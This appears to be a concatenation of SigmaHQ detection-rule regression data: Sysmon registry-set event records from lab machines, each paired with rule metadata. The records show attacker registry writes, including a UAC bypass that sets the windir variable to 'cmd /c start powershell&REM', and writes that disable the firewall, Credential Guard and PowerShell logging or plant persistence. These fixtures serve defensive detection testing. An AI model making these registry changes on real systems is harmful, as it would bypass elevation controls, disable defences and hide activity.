"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:43:38.730630Z"
}
},
"EventRecordID": 27806256,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:43:38.715",
"ProcessGuid": "5AA13A44-5DCA-68FE-8B55-000000004002",
"ProcessId": 9920,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\mscfile\\shell\\open\\command\\(Default)",
"Details": "C:\\Windows\\System32\\cmd.exe",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml
================================================
id: a6667fba-7437-4b37-8584-5de021f91115
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af
title: Bypass UAC Using Event Viewer
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:50:12.576627Z"
}
},
"EventRecordID": 27929906,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:50:12.565",
"ProcessGuid": "5AA13A44-5F54-68FE-B455-000000004002",
"ProcessId": 2768,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\windir",
"Details": "cmd /c start powershell&REM",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml
================================================
id: 48965782-760d-4620-9bf3-7fb0bb441d0f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 724ea201-6514-4f38-9739-e5973c34f49a
title: Bypass UAC Using SilentCleanup Task
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/724ea201-6514-4f38-9739-e5973c34f49a.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:10:21.083557Z"
}
},
"EventRecordID": 28299540,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:10:21.071",
"ProcessGuid": "5AA13A44-640D-68FE-3756-000000004002",
"ProcessId": 992,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber",
"Details": "DWORD (0x00001189)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml
================================================
id: 88bf1ccf-789d-4864-9eaf-547990ffe90a
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 509e84b9-a71a-40e0-834f-05470369bd1e
title: Default RDP Port Changed to Non Standard Port
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:12:38.481829Z"
}
},
"EventRecordID": 28344631,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:12:38.476",
"ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002",
"ProcessId": 7460,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\https",
"Details": "DWORD (0x00000002)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:12:38.491176Z"
}
},
"EventRecordID": 28344632,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:12:38.476",
"ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002",
"ProcessId": 7460,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\http",
"Details": "DWORD (0x00000002)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:12:38.500426Z"
}
},
"EventRecordID": 28344633,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:12:38.492",
"ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002",
"ProcessId": 7460,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\*",
"Details": "DWORD (0x00000002)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml
================================================
id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393
title: IE Change Domain Zone
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-26T06:45:50.191274Z"
}
},
"EventRecordID": 23575,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3484,
"ThreadID": 3424
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-12-26 06:45:50.187",
"ProcessGuid": "0197231E-2F1D-694E-F304-000000000A00",
"ProcessId": 12232,
"Image": "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\EnableVirtualizationBasedSecurity",
"Details": "DWORD (0x00000000)",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml
================================================
id: 7d8d93c3-25b2-4225-9f91-66997f5b446f
description: N/A
date: 2025-12-26
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0
title: Windows Credential Guard Disabled - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:22:33.661127Z"
}
},
"EventRecordID": 28528165,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:22:33.654",
"ProcessGuid": "5AA13A44-66E9-68FE-AC56-000000004002",
"ProcessId": 7108,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled",
"Details": "DWORD (0x00000000)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml
================================================
id: b60c9c4c-27e7-4870-af1d-f35582a44c07
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a
title: Windows Hypervisor Enforced Code Integrity Disabled
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:29:32.286061Z"
}
},
"EventRecordID": 28656599,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:29:32.271",
"ProcessGuid": "5AA13A44-688C-68FE-D556-000000004002",
"ProcessId": 2712,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareServer",
"Details": "DWORD (0x00000000)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:29:32.296086Z"
}
},
"EventRecordID": 28656618,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:29:32.287",
"ProcessGuid": "5AA13A44-688C-68FE-D656-000000004002",
"ProcessId": 368,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareWks",
"Details": "DWORD (0x00000000)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml
================================================
id: c99b67cd-0a57-4023-9f88-35806d622b48
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e
title: Disable Administrative Share Creation at Startup
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:36:31.269411Z"
}
},
"EventRecordID": 28785637,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:36:31.258",
"ProcessGuid": "5AA13A44-6A2F-68FE-0857-000000004002",
"ProcessId": 9720,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall",
"Details": "DWORD (0x00000000)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml
================================================
id: aa89a142-e72f-4b37-acd2-274ed81a1477
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 974515da-6cc5-4c95-ae65-f97f9150ec7f
title: Disable Microsoft Defender Firewall via Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T18:42:48.447971Z"
}
},
"EventRecordID": 28901143,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 18:42:48.434",
"ProcessGuid": "5AA13A44-6BA8-68FE-2F57-000000004002",
"ProcessId": 7476,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience",
"Details": "DWORD (0x00000000)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml
================================================
id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6
title: Disable Windows Security Center Notifications
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T23:49:35.941239Z"
}
},
"EventRecordID": 16380977,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-25 23:49:35.941",
"ProcessGuid": "5AA13A44-620F-68FD-9A3E-000000004002",
"ProcessId": 9952,
"Image": "C:\\Windows\\system32\\regsvr32.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\(Default)",
"Details": "FakeAmsi",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml
================================================
id: 825fc38f-ff54-4338-8016-6f3477c7aa8f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705
title: Potential Persistence Via New AMSI Providers - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T23:53:11.117530Z"
}
},
"EventRecordID": 16447792,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-25 23:53:11.114",
"ProcessGuid": "5AA13A44-62E7-68FD-C13E-000000004002",
"ProcessId": 8536,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\\(Default)",
"Details": "{00000001-0000-0000-0000-0000FEEDACDC}",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml
================================================
id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 9b0f8a61-91b2-464f-aceb-0527e0a45020
title: Potential COM Object Hijacking Via TreatAs Subkey - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T23:56:33.715505Z"
}
},
"EventRecordID": 16510574,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-25 23:56:33.705",
"ProcessGuid": "5AA13A44-63B1-68FD-D93E-000000004002",
"ProcessId": 9452,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\UserInitMprLogonScript",
"Details": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\art.bat",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml
================================================
id: 84c6a082-3aa5-4387-b113-60415aeb9458
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 9ace0707-b560-49b8-b6ca-5148b42f39fb
title: Potential Persistence Via Logon Scripts - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-31T05:57:54.388692Z"
}
},
"EventRecordID": 657715,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3080,
"ThreadID": 4948
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-31 05:57:54.387",
"ProcessGuid": "14207D89-4FE2-6904-D207-000000004002",
"ProcessId": 5612,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-1938467512-983293709-721003795-1103\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging",
"Details": "DWORD (0x00000000)",
"User": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml
================================================
id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e
description: N/A
date: 2025-10-31
author: SigmaHQ Team
rule_metadata:
- id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7
title: PowerShell Logging Disabled Via Registry Key Tampering
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
